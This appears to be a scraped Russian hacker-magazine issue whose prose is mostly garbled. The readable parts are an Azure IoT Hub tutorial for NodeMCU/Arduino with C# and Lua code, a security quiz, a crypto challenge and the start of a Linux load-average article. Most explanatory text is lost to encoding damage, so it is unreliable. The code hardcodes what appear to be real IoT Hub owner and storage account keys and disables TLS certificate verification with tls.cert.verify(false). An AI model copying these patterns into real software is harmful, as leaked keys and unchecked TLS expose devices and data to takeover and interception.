??�?????�????燦odeMCU,燗rduino��????�??�??�??�?????�?�??�???�???�
??/??????��?????????�??????�??�??�???�?.
????????燗ZURE-???????�??�????????燬AS
?� ?????�??� ??????????�???� ???�?� ???�?� ??????�?????� Azure????�???.
???� ???�??�?????� ????�???,� ???????� ???�?� ??????� ???�?� ??� ???�???� Azure
?�??�??�?.�??�?�??�???,�?�????�???�??�???�????�?????�??�?�???
??�???�??�?.�????�?,�??�?�?�??�???�?�??�?????��???�?????�?��?
Visual� Studio� ?� ????�?� ?????� ???�???????� ?� Azure� ???� ?� ???????�???�??�??
????.�?????�??�???��????�???�???????,�??�??�???,�?�??�?�???�??
???�????.�?�??�????�?????�????�?,�??�??�??�???�??�?�?????�?????
????,�?�???�????�?????�(????�??燬ingle爎esponsibility).
???�???燗zure燜unction燗pp�??�?�?�??�???,�????�??�?????�??�????�
??.
???�????燗zure????�???
Consumption� Plan� ???�???�?� ???�???� ????�?� ??� ??� ??????� ???�???,� ???????
????�????�???.�??�????�?????�??�???�??.�?�??�??�?????�??�???
???????�??�???�???�?�??�???�?.�?????,�??�???�?��??�??�?�??�????�
??��???�???�???�??�??�???�?�??�??�(Storage).
???�?� ???�????� Function� App� ???�?� ???�???� ?� ????� ???�???.� ?� ???�??
???�??�??�??�?�??�???�???燱ebhook�+燗PI.�??�???�????�???�????�?
????� (???�??�??� ???�??),� ?� ?????� ????� ???�????� ????�?� ????�???�??� ????�
????�???.�??�??�?�???????�?�???�?????��??�??�?,�????�?�???�?�
Get爁unction燯RL.
??�?�?????�燗zure????�??�?
???�???�??�?�?????�?�??�?????�??�??.��???�??????燙#.
using System.Net;
using Microsoft.Azure.Devices;
using Microsoft.Azure.Devices.Common.Security;
using System.Globalization;
using System.Security.Cryptography;
using System.Text;

public static async Task<HttpResponseMessage> Run(HttpRequestMessage req, TraceWriter log)
{
    string deviceid = req.GetQueryNameValuePairs()
        .FirstOrDefault(q => string.Compare(q.Key, "deviceid", true, CultureInfo.InvariantCulture) == 0).Value;
    string hash = req.GetQueryNameValuePairs()
        .FirstOrDefault(q => string.Compare(q.Key, "hash", true, CultureInfo.InvariantCulture) == 0).Value;
    if (String.IsNullOrEmpty(deviceid)) return req.CreateResponse(HttpStatusCode.BadRequest, "device id missing");
    if (String.IsNullOrEmpty(hash)) return req.CreateResponse(HttpStatusCode.BadRequest, "hash missing");
    var resourceUri = "ArduinoDemoHub.azure-devices.net/devices/" + deviceid;
    // taken from IoT Hub user with Connect devices rights (not from Device Explorer)
    var connectionString = "HostName=ArduinoDemoHub.azure-devices.net; SharedAccessKeyName=iothubowner; SharedAccessKey=cuYBKc42lfJr4oSRGQGQ8IiKWxGQkLre7rprZDZ/ths=";
    var registryManager = RegistryManager.CreateFromConnectionString(connectionString);
    var device = await registryManager.GetDeviceAsync(deviceid);
    var key = device.Authentication.SymmetricKey.PrimaryKey;
    HMACSHA256 hmac = new HMACSHA256(Encoding.UTF8.GetBytes("somerandomkeyKJBWyfy4gski"));
    var hashedkey = Convert.ToBase64String(hmac.ComputeHash(Encoding.UTF8.GetBytes(key)));
    if (hashedkey != hash) return req.CreateResponse(HttpStatusCode.BadRequest, "wrong hash");
    SharedAccessSignatureBuilder sasBuilder = new SharedAccessSignatureBuilder()
    {
        Key = key,
        Target = resourceUri,
        TimeToLive = TimeSpan.FromDays(Convert.ToDouble(7))
    };
    var SAS = sasBuilder.ToSignature();
    return req.CreateResponse(HttpStatusCode.OK, SAS);
}
???�???�???爌roject.json��????�???��???�??�?????�????�????:
{
    "frameworks": {
        "net46": {
            "dependencies": {
                "Microsoft.Azure.Devices": "1.4.1"
            }
        }
    }
}
?� ????� ??????�???�?� ????�?� ???�??�????� ?� IoT?????.� ??� ???�?� ???�???
??� ????�??� ???�??�????� ?� ??????�???.� ??� ???�??� ???�??� ?????�?,� ???� ??
???�?�????.
????�??�???�營oT?????
??�???�???�????燙onnection爏tring�?�????????????燩olicy��??�???燚evice
connect.� ????� ????�?� ???�??�????� ???�?� ??� ???�?????� ?� ????,� ???� ???�??� ?
(???� ?????�?????�?� ????� ???�???).� ???�?� ???�?� ???�?� ?� Application� settings
???�???.
????�???�??�??�?,�?�??????�??�?�??�?燗pplication爏ettings
?� ???�???� ???� ????�?� ???�??�????.� ???�?� ???�?� ??� ???�?� �??�?????�
??�??????�???�??�???�?��??????
ConfigurationManager.ConnectionStrings["???_?????_??????_???????????"
].ConnectionString
??� ??????�???� ???� ????�?????� ???�?????� hashedkey.� ??� ????�???????�?
???�?� ????�???�???� ???� ????�?,� ???�???�?� ??????�???� ???�??� ?????� ?????
Get,��?�??�??�???�????�??�???�??�???��??�????�??????�?.�??????
???燞ttpUtility.UrlEncode�?�???�????�??燬ystem.Web:
hashedkey = HttpUtility.UrlEncode(hashedkey);
?????????�???�??�???????�?????��?????
?�??????�?????�??�??�?燣ua,�?????�?????�??�??��???�?.�??????�?
???�??�?????燩oC.�?????�??�?????�?????��?????�?????�??�???�???�
??.
???�???�??�??�?:爄nit.lua�燬endDataToCloud.lua.�????�????�??�???:
-- Print basic information about the module
print('init.lua ver 1.2')
wifi.setmode(wifi.STATION)
print('set mode=STATION (mode='..wifi.getmode()..')')
print('MAC: '..wifi.sta.getmac())
print('chip: '..node.chipid())
print('heap: '..node.heap())
-- Wi-Fi settings (placeholders: put your own network name and password here)
station_cfg={}
station_cfg.ssid="YOUR_SSID"
station_cfg.pwd="YOUR_WIFI_PASSWORD"
station_cfg.save=false
wifi.sta.config(station_cfg)
wifi_status_codes = {
  [0] = "Idle",
  [1] = "Connecting",
  [2] = "Wrong Password",
  [3] = "No AP Found",
  [4] = "Connection Failed",
  [5] = "Got IP"
}
sntp_connect_status_codes = {
  [1] = "DNS lookup failed",
  [2] = "Memory allocation failure",
  [3] = "UDP send failed",
  [4] = "Timeout, no NTP response received"
}
-- Wait for the Wi-Fi connection (the timer polls once per second)
tmr.alarm(6, 1000, 1, function()
  if wifi.sta.getip() == nil then
    print("Waiting for IP address! (Status: "..wifi_status_codes[wifi.sta.status()]..")")
  else
    print("New IP address is "..wifi.sta.getip())
    tmr.stop(6)
    -- Synchronise the clock over NTP
    sntp.sync({'pool.ntp.org'},
      function(sec, usec, server)
        print("Clock Synced: "..sec..", "..usec..", "..server)
        -- TLS certificate verification is switched off here, so the server's identity is not checked
        tls.cert.verify(false)
        -- Run the main script
        dofile('SendDataToCloud.lua')
      end,
      function(error_code)
        print("Clock Sync Failed: "..sntp_connect_status_codes[error_code])
      end
    )
  end
end
)
????� ????� ?????�???� ???�??�????� ?� ????� ?� ?????�???� ???� ??� ???�?� Send?
DataToCloud.lua� ?� ???�??� ???????�?� ???�??�????.� ????�?????� ???�???
?� ?????�??� ???�????� station_cfg.ssid� ?� station_cfg.pwd� ???�??� ???�?� ???�???
Wi?Fi.
?�??�?????�??�?�???�???�???�??�?????�???�營oT?????�(????????�
???� DEVICE� ?� IOTHUB).� ?� ???????�??� funcurl� ???�??� ?????� ??????�?????
SAS�??�???���????�??�??�????�??????�?爃ash�??�??�??�??�?�?????�
??� (???????� ??� ????�???????�?� ??????�???�?� ?� ???????
HttpUtility.UrlEncode).
??�???????????
DEVICE��"LuaDevice"�
IOTHUB��"ArduinoDemoHub.azure?devices.net"牋�
PORT牋��83
USER牋��"ArduinoDemoHub.azure?devices.net/"..DEVICE.."/
api?version=2016?11?14"
telemetry_topic="devices/"..DEVICE.."/messages/events/"
connected�爁alse
local爃eaders��
牋牋牋�'Content?Type:燼pplication/x?www?form?urlencoded\r\n'..
牋牋牋�'Accept:�*/*\r\n'..
牋牋牋�'User?Agent:燤ozilla/5.0�(Windows燦T�1;燱in64;爔64;爎v:47.
0)燝ecko/20100101燜irefox/47.0'
funcurl��"https://arduinofunction.azurewebsites.net/api/Genera
teSASFunction?code=Jn7j54PbR31BSRa0UZrDwp4ZEltjmWHmblG9zLo0Ne0tyGM7w/
wQ7w=="
funcurl�爁uncurl.."&hash=oJzykimyQsTPtzgJxYq90Xfqmw1rZTPTCH%2bJ5sS
urKI%3d"
funcurl�爁uncurl.."&deviceid="..DEVICE
tmr.alarm(1,5000,�爁unction()
http.get(funcurl,爃eaders,�
牋function(code,燿ata,爃eader)
牋牋if�(code��爐hen
牋牋爌rint("HTTP爎equest爁ailed")
牋爀lse
牋爏as�爐rue
牋牋爌rint(code,燿ata)
牋牋牋if爏tring.match(data,�"Shared")爐hen
牋牋牋牋tmr.stop(1)�
牋牋牋牋SAS�爏tring.sub(data,2,string.len(data)?1)
牋牋牋牋print(SAS)
牋牋牋牋connect(SAS)
牋牋牋end
牋爀nd
牋end)
爀nd)
function燾onnect(SAS)牋牋
??�??????�?????燤QTT
client�爉qtt.Client(DEVICE,�0,燯SER,燬AS)
??�???????????�營oTHub��??????�????????燤QTT
print�("Connecting爐o燤QTT燽roker.燩lease爓ait...")
牋tmr.alarm(2,1000,�爁unction()
牋牋client:connect(IOTHUB,燩ORT,�
牋�?燙allback��?????�????????�??????????
牋爁unction(client)
牋牋牋爐mr.stop(2)�
牋牋牋爌rint("Connected爐o燤QTT:�"..IOTHUB..":"..PORT.."燼s�"..
DEVICE)
牋牋牋燾onnected�爐rue
牋牋牋爏enddata()牋牋牋牋
牋爀nd,
牋�?燙allback��?????�?????
牋爁unction(client,爎eason)
牋牋牋爌rint("Error燙onnecting:�"..reason)
牋爀nd
牋牋牋牋牋)
爀nd)
end
function爏enddata()牋牋
牋爉ath.randomseed(1)
牋爐mr.alarm(3,�00,爐mr.ALARM_AUTO,爌ublish_data)
牋�?�???�????�?????????,�?�????�???????�????????燾allback
牋燾lient:on("offline",爁unction(client)
牋牋牋爌rint("MQTT燚isconnected.")
牋牋牋燾onnected�爁alse
牋爀nd)
end
??�??????,�???????????�?????��?????
function爌ublish_data()
牋爄f燾onnected�=爐rue爐hen
牋牋牋爏omedata�牋math.random(1,100)
牋牋牋�?�?????????????�?????�??�???????
牋牋牋爌ayload�牋
牋牋牋牋牋�"{燶"deviceId\"�燶""..DEVICE.."\","..
牋牋牋牋牋�"\"iotdata\"�"..somedata.."}"
牋牋牋�?�?????????�?????
牋牋牋燾lient:publish(telemetry_topic,爌ayload,��爁unction(
client)
牋牋牋牋牋爌rint("Data爌ublished爏uccessfully.")
牋牋牋爀nd)
牋爀nd
end
???�??� ??????�???�?� ???� ??????�??????� Azure� SDK,� ???� ???� ??????� ????�
??????�???�??�?�???�?�??�?????�?�??�??�???�?�燗zure.�??�??�????
???�????�?�??�?:燗WS,燝oogle燙loud營oT,營BM燱atson營oT燩latform.
?� ???�???� ??????�???�?� ???�????� MQTT� (Message� Queuing� Telemetry
Transport).� ???� ?????�??� ???�????,� ???????� ???�??????� ???�????�?� ???� IoT?
??????�??.�??�??�?????�???�?��??�???燡SON.�??,�??��????�??�???�
?????�??�??�??�???�?��??�????,��??�???�?????�???�?�??�??�??�???�
??.� ??� ???�?� ???�??�?� handshake� ???�?� ??????�????� ?� IoT??????� ???�??
?????� ?????�???� ????� ???�??????,� ?� ?????� ???�?????� ???�??????� ???????�
????.� ????� ???�???,� ??� ?� ????�??� ???� ???� ??????� ?� Arduino??????�??� ??
???�???�?�??�??�?????�??.�??�??�?�??�????�?�????�???�?�???:
tls.cert.verify(false)
??�?????�???�?�??�?????�??,�??????�????�??�??�??�??.
INFO
??�??�????� ???�?????�??� ????� ???�?� ????????
?�??????�??�?????�????�?燨penSSL:
openssl s_client -showcerts -connect ArduinoDemoHub.azure-devices.net:8883
????????�燦ODEMCU�?燗RDUINO營DE
??�???�???�?�??�????�???�?????�??????燬DK.�???�??????,�????�?,
??????,� ??� SDK� ?� ???� ???� ??� ?????� ???,� ???????� ???� ????�??,� ????�??
?� ?????� ???� ??????�??????.� ???�???�?� ????� ?� ???,� ???� ???�??�??� ?� ???????�
??????燗rduino營DE�??�?????�燦odeMCU.�??�?�???�??�?燗rduino營DE�???�
??�??�?��???燜ile�燩references.
???�???�?燗rduino營DE
?�???????�???�?�?�????�?????�??�????�??�???��???�?��???燗ddi?
tional燘oards燤anager燯RLs�????
http://arduino.esp8266.com/versions/2.4.0/package_esp8266com_index.json
??�??� ???�?� ?� ????� Tools� ?� Board� xxx� ?� Boardx� Manager� ?� ????�?????
ESP8266.
??�????�???�?� ???�????�?� AzureIoTHub,� AzureIoTUtility,� AzureIoTProto?
col_MQTT.� ???�?� ????�??�?� ???�?????� ???�????�?� ?� ???�????� (????� File� ?
Examples� ?� AzureIoTProtocol_MQTT)� ???�?� ???�?� ???�??� simplesample_mqtt
???燛SP8266.�??�??�????��?????.�??�????�?�???�?�????�???�??�????
???????�??��??�?爄ot_con?gs.h.
???�???� ??� ?????� ??????�??� ??????.� ???�??????� ???�???� ?� ???�????
??�??�?,�?�???�????�燣ua,�?????�?�?????�?�??�??�??�?.
??????????�?????��?????燗ZURE
?�?????�??�??�??�??�????�?,�?�??�?????�?�??�?????�??�??��????�
???�????�??�??�??�?�????�?????�???�??�??�????�???�??�??�?營oT?
????��???�??�??��??�?�?燗zure燜unctions.��????�?????�??�??�????�
??�??�??�燗zure燭able燬torage.
INFO
????�?� ???????� ???� ??????�??????� ????????
???�????� ??� ??????� ???�??�???� ???�???�???
?�???�???�??�?��???????�?�???�??????�???�
???� ??� ???�?.� ???�?� ????� ??� ???�??�?� ???�???�
??????�?� ????�???� ????�???� ??� ????????????
????�?��???.
??�????�?,� ???� ???� ???�????� Function� App� ????�???�??�?� ???�???�?� ?� Stor?
age,� ???????� ????�????� ?????� ???�???� ???� ??????.� ????� ??� ???�????
??????�??�??�???�?,�?�???????�??�???�?�???????�?�??�???�??�??�?
??????:
???�????燬torage燼ccount
LSR????�??????� ?� ???� ?????� ??????�??� ??� ???�??� ??????� ????�??.� ??
??????�???� ???� ????�???�??�??� ???�????� ???�???�?,� ???�????�???� ?� ????�
????.
???�??�??�??�?�???????�??�??�?營oT?????��?????�???�?��??�????�
??.� ???� ???�?� ???�??� ????�?� Quick� Start� ???� ???�????� ???�???� ???�??� ???
????�??�???�?????�?�??�??.
???�????燗zure????�???��???燪uick燬tart
??�??�?�?????�?�???�?燙ustom爁unction,�??�??????�??�??�?,��??????�
??�???�??營oT燞ub�(Event燞ub).�????�??�????�???�????�???�?:
???�????�??�???�??�?????�營oT??????
??�?� Event� Hub� connection� ??� ?????� ?????�???� ????�??� ???????� (?????
new).� ?� ???� ???�?� ???�???� Event� Hub� name,� ????�?????� ???�?� ?� IoT????,
?� ????� ?� ?� Endpoints� (?????�??� ???�?)� ?� ?????� ????�?� Event� Hub?compatible
name.
??�???�??�??�?,�??�????�???�燛vent燞ub
??�??�??� ?� ????� ???�???.� ???�?????� ????�??� ??????�?� ???�??� ??� IoT?????
?�??�???�?�燭able燬torage:
#r "Microsoft.WindowsAzure.Storage"
#r "Newtonsoft.Json"
using Microsoft.Azure; // Namespace for CloudConfigurationManager
using Microsoft.WindowsAzure.Storage; // Namespace for CloudStorageAccount
using Microsoft.WindowsAzure.Storage.Table; // Namespace for Table storage types
using Newtonsoft.Json;
public static void Run(string myIoTHubMessage, TraceWriter log)
{
    // Deserialize the JSON message received from the IoT hub
    var e = JsonConvert.DeserializeObject<EventDataEntity>(myIoTHubMessage);
    log.Info($"C# IoT Hub trigger function processed a message: {myIoTHubMessage}");
    // The storage connection string (account name and key) is embedded in the source here
    CloudStorageAccount storageAccount = CloudStorageAccount.Parse("DefaultEndpointsProtocol=https;AccountName=iotdatademostorage;AccountKey=JgStNcJvlQYeNsVCmpkHQUkWlZiQ7tJwAm6OCL34+lGx3XrR+0CPiY9RoxIDA6VSvMKlOEUrVWL+KWP0qLMLrw==;EndpointSuffix=core.windows.net");
    CloudTableClient tableClient = storageAccount.CreateCloudTableClient();
    // Get the target table, creating it on first use
    CloudTable table = tableClient.GetTableReference("iottable");
    table.CreateIfNotExists();
    // One row per message: fixed partition key, random GUID as row key
    EventDataEntity edata = new EventDataEntity("IOTpartition", Guid.NewGuid().ToString());
    edata.DeviceId = e.DeviceId;
    edata.IotData = e.IotData;
    TableOperation insertOperation = TableOperation.Insert(edata);
    table.Execute(insertOperation);
}
public class EventDataEntity : TableEntity
{
    public EventDataEntity(string pkey, string rkey)
    {
        this.PartitionKey = pkey;
        this.RowKey = rkey;
    }
    public EventDataEntity() { }
    public string DeviceId { get; set; }
    public int IotData { get; set; }
}
??�?� ??� ??????� ??????�?????� ????� ???� ?� ?????�??� ???�???,� ??� ??� ??????
?????�?�???�?�??�??�????��????�??????�??�??�?��燗pp爏ettings�(????�
??� ???� ??,� ???� ?� ????�?� ???�??�????� ???�??� ???�???).� ????� ????�?� ???�???�
?????�??�?�????��??�??�??�??�?�??�??�???�?燗ccess爇eys.
???�?�??�???��??�??
????�????�???� ?????�????� ???�??� ???�?� ?� ???????� ???�???�??� ???�???
Azure燬torage燛xplorer.�??�??�??�?????燗zure燭able燬torage�?????�?�??�??,
?� Azure� Functions� ?� IoT????� ????�???�?� ????�????�??� ?????�?� ???�????�?
???�???�?,� ??� ???� ???????� ?� ?????� ?????� ????�???� ????�?� ???� ?� ???�??.
?????�?,� ???� ???????� ??� ???????�??� ???�??.� ???�??� ???:� ??� ?????�?????
??????� 1� ?????� ???�??� ???�?� 7� ???�??� ?� ?????� ?� ??� ???�??� ???�???� ?????�
??????��???�???�??�??�?.
WWW
???�??�????�?�?????�??�?????�???????�???,
???????� ???�????� ??� ????�?:� Sending� Device?to?
Cloud� (D2C)� Messages.� ???� ???� ??� ???�??� ?????�
???�??,� ?� ????�???� ???� ???�???� ????�???,� ??� ?
?????�???�?�????�??�???�?�????�??.
??????
??????
??�?????????????
??�??????��??????:
??????�?燞ACKERU
?????????�????????
lozovsky@glc.ru
???�???�?� ??� ??� ??????�?� ????� ??????�?� ??� ??????�????�
????.� ????� ??????�???�?!� ?????�?� ????�?� ????�???�???
????��?????�??�???�??�???�� ???�??�??�?�???????�
????�??� ???????�????.� ??????�???� ???,� ???� ???�????
????????�?,� ???�??�??????�??� ???�????�??� ???�???� ???
?� ???�????,� ????�????�?� ???�??????� ????�??????� ??????
?�???��??????�?��?.
IT-????????, ????? ??? ???? ???????!
???�??�???�???????�???��???�???�???�??,�????�?�?�??�???�?�???�
????�?� ?????�???�??� ?????�?,� ???????� ???�?????� ???�????� ????�???�?
????�??????.� ??� ???�?� ?????�?� ??� lozovsky@glc.ru� ?� ??� ??� ???�???�?.
???????� ?????,� ??????�??,� ??????�??� ?� ????????�??.� ??????�??� ?� ?????�?,
??????�??� ?� ?????�?,� ???� ?� ???�???� ??� ?????� ???�????�????�??� ?????�
?????,� ????�????� ?� ?????�?� ????????�?� ??� ???�?????�?� ?� ???????� ??????�
????�??�??�???.
????�?�?????�??�??�??:�??�????�??�???�?�?????,�?????�?�?�???�?
?�??�???�?�??�???�??�???�?,�?�??�?????�?�??�?,��???�?�??��???�
????�?� (????�?,� ??� ????� ??????� ???�?� ??????�?� ???,� ???� ?????�?� ???�???
????�?????�??�?,�??????�??�??�?�??????�??�???�?��?????�?????
??�?????�???�)).
??�??�?????�??????�??�???�?�?????�?�????�???�??�??�????�???�
?????,� ????�???�???� ????� ???�????,� ?� ????� ?????�??� ?????�???� ???????.
?????�?!
??????�???????
1.� ???� ?????� ????�???� ???�?� ???�???�????�?� ?????�???� ???-�
??????�??�?????�???????�?????
1.�?�??�????�???�?.
2.�?�????�???�???�?.
3.�?�???�??�??�??????�???????�????��??�????�??�??�???�?.
2.� ???�????� ??� ????�?� ???�??� ????�?????�?,� ????� ??� ???�??� ??
?�??�????�??�??�????�??
1.�??.
2.�??,�???�?�????�??�?�??�????�???�??�???.
3.�?.
3.� ??????�?� ???� ??� ???????�?????� ????� ????�??,� ???????� ???-�
????�?????��??????�??�??????�??????�??????:
1.�?�??�???�??�????�???�?????.
2.�?�??????�??�????�?????.
3.�??�??????�??????��??�??�???�?????�??.
4.� ?????� ??� ???????�?????� ????� ???�????�??� ????�???� ????-�
?????�???�??�???�?�?????????�????
1. Chameleon.
2. Virus.Win9x.CIH.
3. Carberp.
5.�????�??�???�?�?????????�???�??�????�?�????�??�???-�
???��??�???�???�????�?�??�?????�??????�???�??�????�?
???�??�???
1. Phishing.
2. Man-in-the-Middle.
3. Man-in-the-Endpoint.
6.��??�??�??�??�?�??�???�?�??�?��??�??�??
1.�?�???�????�??�???�?�??�?�??�???�?�??????�?.
2.�??�??�?�???�????��??�??燤an?in?the?Middle.
3.�???�??�??�?�???�????�燽rute?force燼ttack��??�??�????�??�?????�
??????�??�??�?????�??�????�??�??.
7.� ?????� ?????� DDOS-???�?� ???�???�?� ??????�?� ???�??�????�?
???�????�??�????
1. UDP flood.
2. Http slow post.
3.燚ns燼mpli?cation�??�?.
8.�????�???????�???�?????�?�??�????
1. CRC32.
2. MD5.
3. SHA-2.
9.� ?????� ????�????�????�??� ??????� ??????�???�?� ?� ???�??????
????�????
1.�?�???�??�??�??????.
2.�?�???�????.
3.�??�????�??�???.
10.�?????�?�??�??�???�??�???�???�???�?:
1.�??�??燞TTPS�??�??????�??�????�?�??�???�?????????�????.
2.燞TTPS�???�???�?????�??�?�???�????�燞TTP�??�???�??.
3.燞TTPS� ?� ???� ???�??????� ???�???�?� HTTP,� ?� ???????� ?????�???� ????�
???????� ??????�?????� ??� ????�???????� ???????�??� ???�???�?� HTTP
???�??.
?????????�??????
??�????�??� ???????� ?????�??�?� ???�????�?� ????�?� ????� ???�???� ?????�?????�??
????�????,� ???????� ???�??� ???�??.� ?????� ??� ???�????�?� ?� ????� ????� ?????�
?????� ?????�???�???�?� ?????� ??????�??� ?????�????�??� ???�??.� ??????
??�????:爄nfected.
???�???�?:�??�?�???.
??�????�?� ?????� ???�?????�??� ???�?????� ?????�????�??� ???????�??� ?� ???�?
?ag.enc.� ???�??� ????� ?????�????� ????�??�??� AES?256?ECB.� ?� ???????,
?�??�???�???�?�????�????�???�??�?� key.enc.�???�???��??,�??�?
?????�????�???�??�??燫SA�??�?????�??�??爇ey.pub.
???�???�?:�??�????�???�???爁lag.enc��??�???�???.
?????��??????
??�???�??�????�??�???�?�???�??????:爀p@smcomm.ru.
????�??� ????� ?????� ?????�??� ???�????� ???�?� ????�??�??,� ???�???�?
?????�??� ???� ???????.� ??????�???� ???????� ??� HackerU� ???�??�??� ??� ????�
??�0�????�??�??.�??�??�?????�??�???�??�???�?�??�??�????�????�
???�???� ???�?� (20� ???�???�??�??� ?????),� ?� ???�?� ?????� ???????�?� 9???????�
????� ???�?� ??� ????�???� ???�??�??� ???�????�?,� ???�?� ???????�?� ????�
???�????�?????�?燞ackerU�????�???�?�??�???�???�???�?�??�????�??�?.
????�??????� ??????�????� ??� ?????� ?????� ?????,� ??????�?� :).� ?� ???�?
????,�??�?�??�?�??�????�???�??�????�?�????�??,�??????�???�????�
??� ???�??????� ??????�???,� ??????�?� ??� HackerU� ???�???�?� ???�??�?????
???�?� ????�??�??� ???� ???�???�?� ??????�??� ???????�??� (?� ????� ???�????�
???).
?????
????????
?�???????
???�?????�??,�??�?????????�
?�????燣INUX????????
???????爀nchantner
??????
enchantner@gmail.com
??� ???�??,� ???� ?� ???�?� ???�?� ???�???�???�?� ?� ????� ?� ????�
?????� ???�????,� ??� ????� ????�????�?� ????????� ???�????
??????�??�?� ??????�??� Prometheus� ???� Zabbix,� ??� ???�??
??�?,�??�?????�???????�??�?????�???�?��?????�???�
????��??????��???�?????�?�??�??�??,�??,�?????�??
?????�???� ????�?� Linux� ?� ????�??�???� ???�???,� ???�?????
?� ?????� ???�??�???�?,� ??????� ???�????� ???????�??
?�?????�??�???.
???�???�??????�???
???� ????�?� ?????� �?????�???�� ???�???�?� ?� ?� ????� ???�?� ????�????
???????�??� ???�??�????,� ?� ????� ???� ???????� ???�?� ????�??????�?� ?� ????�
??????� ???????�??� ???�?????�??�???� ???�?????�??�?.� ??� ????,� ?� ???� ????
???� ???????�??� ????�??� ???�???,� ???????� ??� ?????�???�?,� ?� ??� ???????�
?????� ?????,� ????� ????�?????,� ?????�???� ???????�???� ???�??�????.� ????�
?????,� ????????� ???�????� ?� ????�???.� ?� ???� ??� ?????� ?????�???� ???�???�
?????�??�???�?,�??????�??�?????�???�??�??�?�??�???�??????�???
???????.
?�??,�??�????�?�????,�?�??�??�營T,�???�?????�??�???�??�??,�?�
?????� ???????� ?� ????�?� ???� ?????� ?� ?????� ???�????,� ??� ???????� ???�??�?
????????� ?????,� ???� ?� ???�????�???� ????�???.� ???� ???�??� ????�??�??�????
???�??��??�????�燝raphite/Icinga/Zabbix/Prometheus/Netdata�(???�??�???�
???�????)� ???� ???� ????�?� ???�????� ?????????,� ?� ???????� ???�?� ?????�???
???�???,�?????�??�?????��??�?�??�??.
????�???�??� ????� ???�??� ??????�?� ???�???�?:� ??� ?????�??� ????,
??� ??????�?� ??� ?????� ???�?????,� ????�??�???�???� ???� ??????�???� ????�?,
???�??�????�?,��???�?�??�??�???�??�?�?????�?爌ush�??爌ull.�?�???
????� ??� ???�???�?� ???�?� ????�?� ???�???????,� ?� ??� ??????�?� ????�??�??�?
????�???� ????� ????�?� ?� heartbeat,� ????� ??,� ?????�??,� ??� ?????�???� ????
?�??�??�??�?????�??�?�?�??�???,��??�??,��???�??�???,�??�????
?�???�???�?�???�?��??????�???�???.
???,� ?� ??� ????� ???�??�?????� ?� ???�?????�??,� ???� ???�??�????� ?????�??
???�???.� ????�?� ???�?� ??� ??????� ??????� ??????�???� ??� ????,� ???� ????�?
???�???�??��??�???.�???�?,�??????�???????�??�??�??�????�???�???�
?????� ?� ??????� ????�??� ???�???� �?�??�??�???� must� have�.� ???�??????�?
???????�????�???.
???????�??????????�?�???????
??�????�?�????�??????�??�??�??�?�??�??�???�?�?�??�??�?�??????�
??�?燣inux�???��??�??.�??�???�????�???爑ptime,�?�?�??�?�??�?????�
???� ??????� ???�???� ?� ?????�?� ???�?????� ???????�????.� ???�???� ???� ???
????�????� ??????�???� ???�?� ???� ??� ?� ????�?� ?????� ?????�?� ?????�??
???????�??:
$ uptime
13:43爑p�ays,�23,�sers,爈oad燼verages:�01�04�01
?� ??????� ????� ???????� ???�?,� ?????� ????�???�?� ??????,� ?????� ???????�??
??????�??�????��??�???�???�?????�??,��???�?�?????�???爈oad燼verage,
??�????�????�???�??�??�??�?,��??????�??�?�???�???�?�?�??????�
????�???.� ????�?,� ????� ???� ?????�?� w,� ???????� ????�?� ??� ??� ?????� ?????�?
????�???�????�??�?????�??????�??��??,�??�??�??�?�??�??�????�
??.
??�????�??� ??� uptime� ???�?� ???�??????� ???�????� ?� /proc,� ????�?
?�????�??�??�??�????�???�?�????�????�??�???�???:
$ cat /proc/uptime
5348365.91�72891.73
?????�??�??�??�?��??�????�?�?????�??�???�?????�?��????�?�????�
??,� ?� ???�??� ?� ?????�?� ??� ???� ???� ??????�?� �??�??�??�,� ??� ?????� ???�??
??????.
??�????�???�????�?�??�?????�?爈oad燼verage,�??�??�???�???�???�
???.�??�??�????�??�?�??�?,��???�??�??�???�????�???�???????�??�/
proc�(???�?�?�?�????,�??�???�???�???�?�??�??):
$ cat /proc/loadavg
0.01�04�01�2177�278
??�?� ??� ???�????� ???�?� ???�?� ???????�??,� ???� ?� UNIX????�????� ???� ???�?
????�???� ????????�??� ???????�??� ???�??�??,� ???�???� ?� ???�???� ??� ??????�
????燙PU,�??�??�??�??��???�??�??�??�???�???�?�?????�?�????�?:
1� ??????,� 5� ?????� ?� 15� ?????� ?????.� ????�?,� ???�?????� ?????�?� ?� ???� ????�
?????�??�??�??�??????�??�??�??�??,�????�?????�?��??�???�??�??,
?� ???????�??� ???�??�??� ?� ???�???� ????�?,� ?� ?????� ?� ???�?????� ?????�??
???�????燩ID.�??�??�?�????�??�???
?� ???�??� ?� ???,� ???� ???� ???�?� ???� UNIX,� ??� ??� ???� Linux.� ?� ????� ???� ????�
????�?:� ????� ???�?� ?????�???�?� ?� ???�????� ???�???�?,� ????� ???�???�????�
??� ?� ???�??.� ????� ????� ?� ???�???� ????�??????,� ????� ???�?� ???�?� ????� ?
???�??,�??�????�??�0%,�???��?????�????�?��??�??�???,�???�???�
????�?燣inux�??�???�?�?�???�?�??�??�?��??�???燫UNNING,�?��??�???�
??,� ??????�????� ?� UNINTERRUPTIBLE_SLEEP,� ??� ????� ???????� ??� ???????
?�???.�??�??�??,�??�?�??�??�?�????�??�?�??�?????�??�???營/O?????�
?????,�?��?????�?�???�?�??,�?????�??�?????��???�?�???�???�????�
??營/O.�??????,��????�???�??�???,��?�??�?????�???�??????�??�????�
????????� ???� ?� ???� ???� ??????:� �??� ???�???�?� Load� Average�,� 獿oad� Average
?燣inux:�??�????�??�?�.
?????, ??????? ???
??�?�???????�??�??�????�??�?,�燣inux�???????�??????�??�??????�??
???� ?� ???�??�??,� ???� ?� ?� ??????� ???�??� ????�?� ???�????� ???�????�??� ????�
?????� ???�???� procfs� (/proc),� ?� ???�?� sysfs� (/sys).� ?� ?� ???� ??????�?
???????��???�??�??�???�??.
??�?��??,�??�???�?�??�????�??�?????�??�??�??�??燯NIX�??�??:
�??�???�???�,�?�???�??�??�??�????��????�??�?????�??�????�??
?????�????�?� ???�??� ???�???� ?????� ?????�??� ???� ???�????�??� ????,� ????�
??????�????�???�??�?????�?????�??.�??�???�?�???�???�?????��???�
?????�?燯NIX�??�??�???�?燩lan��??�??�??�??�?�???�???????��??????�
??� ?� ???�??�??�???�???� ?� ????� ???�?� ????� ????� ???�???�???� ??????� cat
?� ls,� ???�???�?� ???� ????� ???�??�???.� ????�?� ???� ?????�???� ???�????� ????�
????爌rocfs,�??????�??�?�?????�???�?�燣inux�燘SD.
??,�??���??�??�爈oad燼verage,�??�???�?�燣inux�???�???�??�????�(???
?�??�????�?????�??�??????�?????�??????????).�??�????,�????�????
